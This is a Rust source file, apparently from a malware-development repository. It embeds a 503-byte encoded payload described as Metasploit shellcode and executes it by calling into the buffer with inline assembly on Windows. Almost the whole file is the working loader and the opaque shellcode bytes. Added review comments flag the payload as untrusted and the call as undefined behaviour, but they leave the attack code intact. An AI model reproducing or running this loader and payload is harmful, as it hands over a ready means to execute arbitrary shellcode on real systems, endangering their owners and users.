/*
Executes an embedded shellcode buffer by calling into it with inline assembly (Windows only).
For more codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
Resources Used:
* https://www.ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-inline-assembly-in-c-c++
* https://cocomelonc.github.io/tutorial/2021/12/03/inline-asm-1.html
@5mukx
*/
use std::arch::asm;
/// Entry point: embeds a 503-byte payload as a local array and transfers control to its
/// first byte with an indirect `call` issued through `asm!`.
///
/// The function is compiled only when the target OS is Windows. No alternative `main`
/// is visible in this file, so other targets presumably fail to build (TODO confirm).
///
/// Review notes (defensive reading):
/// * The payload is an opaque byte sequence that the author labels as Metasploit-generated
///   shellcode. Its behaviour is not established by anything in this file, so treat it as
///   untrusted code and handle it only in an isolated analysis environment.
/// * The observable behaviour is an indirect call whose target is a data buffer rather
///   than code belonging to a loaded module. Where data memory is not executable
///   (DEP/NX), the author's own note below describes the outcome: the process exits with
///   0xc0000005 (STATUS_ACCESS_VIOLATION).
#[cfg(target_os="windows")]
fn main(){
// NOTE(review): this is written as an inner attribute (`#!`), so it applies to the
// enclosing `main` item, not to the `shellcode` array declared below. Confirm against
// the compiler's handling before relying on any section placement.
#![link_section = ".text"]
// Payload bytes, described by the author as msf (Metasploit) shellcode. The contents are
// not decoded or verified here.
let shellcode: [u8; 503] = [0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,
0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,0xff,0xff,0x48,0xbb,
0x9a,0xfa,0x6a,0xf2,0x06,0xd6,0x98,0x59,0x48,0x31,0x58,0x27,
0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x66,0xb2,0xe9,0x16,
0xf6,0x3e,0x58,0x59,0x9a,0xfa,0x2b,0xa3,0x47,0x86,0xca,0x08,
0xcc,0xb2,0x5b,0x20,0x63,0x9e,0x13,0x0b,0xfa,0xb2,0xe1,0xa0,
0x1e,0x9e,0x13,0x0b,0xba,0xb2,0xe1,0x80,0x56,0x9e,0x97,0xee,
0xd0,0xb0,0x27,0xc3,0xcf,0x9e,0xa9,0x99,0x36,0xc6,0x0b,0x8e,
0x04,0xfa,0xb8,0x18,0x5b,0x33,0x67,0xb3,0x07,0x17,0x7a,0xb4,
0xc8,0xbb,0x3b,0xba,0x8d,0x84,0xb8,0xd2,0xd8,0xc6,0x22,0xf3,
0xd6,0x5d,0x18,0xd1,0x9a,0xfa,0x6a,0xba,0x83,0x16,0xec,0x3e,
0xd2,0xfb,0xba,0xa2,0x8d,0x9e,0x80,0x1d,0x11,0xba,0x4a,0xbb,
0x07,0x06,0x7b,0x0f,0xd2,0x05,0xa3,0xb3,0x8d,0xe2,0x10,0x11,
0x9b,0x2c,0x27,0xc3,0xcf,0x9e,0xa9,0x99,0x36,0xbb,0xab,0x3b,
0x0b,0x97,0x99,0x98,0xa2,0x1a,0x1f,0x03,0x4a,0xd5,0xd4,0x7d,
0x92,0xbf,0x53,0x23,0x73,0x0e,0xc0,0x1d,0x11,0xba,0x4e,0xbb,
0x07,0x06,0xfe,0x18,0x11,0xf6,0x22,0xb6,0x8d,0x96,0x84,0x10,
0x9b,0x2a,0x2b,0x79,0x02,0x5e,0xd0,0x58,0x4a,0xbb,0x32,0xb3,
0x5e,0x88,0xc1,0x03,0xdb,0xa2,0x2b,0xab,0x47,0x8c,0xd0,0xda,
0x76,0xda,0x2b,0xa0,0xf9,0x36,0xc0,0x18,0xc3,0xa0,0x22,0x79,
0x14,0x3f,0xcf,0xa6,0x65,0x05,0x37,0xbb,0xb8,0xa1,0xeb,0x6b,
0xc5,0xc9,0x58,0xf2,0x06,0x97,0xce,0x10,0x13,0x1c,0x22,0x73,
0xea,0x76,0x99,0x59,0x9a,0xb3,0xe3,0x17,0x4f,0x6a,0x9a,0x59,
0x9b,0x41,0xaa,0x5a,0x07,0x9d,0xd9,0x0d,0xd3,0x73,0x8e,0xbe,
0x8f,0x27,0xd9,0xe3,0xd6,0x8d,0x4c,0xf5,0xf9,0x03,0xd4,0xd0,
0x70,0x92,0x6b,0xf3,0x06,0xd6,0xc1,0x18,0x20,0xd3,0xea,0x99,
0x06,0x29,0x4d,0x09,0xca,0xb7,0x5b,0x3b,0x4b,0xe7,0x58,0x11,
0x65,0x3a,0x22,0x7b,0xc4,0x9e,0x67,0x99,0xd2,0x73,0xab,0xb3,
0xbc,0x3c,0x97,0x86,0x7a,0x05,0xbf,0xba,0x8f,0x11,0xf2,0x49,
0xdb,0xa2,0x26,0x7b,0xe4,0x9e,0x11,0xa0,0xdb,0x40,0xf3,0x57,
0x72,0xb7,0x67,0x8c,0xd2,0x7b,0xae,0xb2,0x04,0xd6,0x98,0x10,
0x22,0x99,0x07,0x96,0x06,0xd6,0x98,0x59,0x9a,0xbb,0x3a,0xb3,
0x56,0x9e,0x11,0xbb,0xcd,0xad,0x3d,0xbf,0x37,0x16,0xf2,0x54,
0xc3,0xbb,0x3a,0x10,0xfa,0xb0,0x5f,0x1d,0xbe,0xae,0x6b,0xf3,
0x4e,0x5b,0xdc,0x7d,0x82,0x3c,0x6a,0x9a,0x4e,0x5f,0x7e,0x0f,
0xca,0xbb,0x3a,0xb3,0x56,0x97,0xc8,0x10,0x65,0x3a,0x2b,0xa2,
0x4f,0x29,0x50,0x14,0x13,0x3b,0x26,0x7b,0xc7,0x97,0x22,0x20,
0x56,0xc5,0xec,0x0d,0xd3,0x9e,0xa9,0x8b,0xd2,0x05,0xa0,0x79,
0x08,0x97,0x22,0x51,0x1d,0xe7,0x0a,0x0d,0xd3,0x6d,0x68,0xec,
0x38,0xac,0x2b,0x48,0xa0,0x43,0x25,0xc4,0x65,0x2f,0x22,0x71,
0xc2,0xfe,0xa4,0x5f,0xe6,0xf0,0xea,0x09,0xe6,0xa3,0x9d,0xe2,
0xdd,0xe9,0x18,0x9d,0x6c,0xd6,0xc1,0x18,0x13,0x20,0x95,0x27,
0x06,0xd6,0x98,0x59];
// Author's note: an alternative said to work is to store the payload as a binary (.bin)
// file and embed it with include_bytes!().
// Example:
// let shellcode = include_bytes!("msfshellcode_payload.bin");
// let shellcode_bytes = include_bytes!(shellcode);
// NOTE(review): nothing in this file makes the block below sound. The operand is the
// address of a data buffer, and the asm! statement declares no clobbers, so whatever the
// called bytes do to registers, stack or memory is invisible to the compiler. Behaviour
// after this statement is undefined.
unsafe{
asm!("call {}", in(reg) shellcode.as_ptr())
}
// Author's note: running the program with 'char' shellcode produces an error
// (exit code: 0xc0000005, STATUS_ACCESS_VIOLATION), because the process does not have
// permission to access the memory it tried to access.
}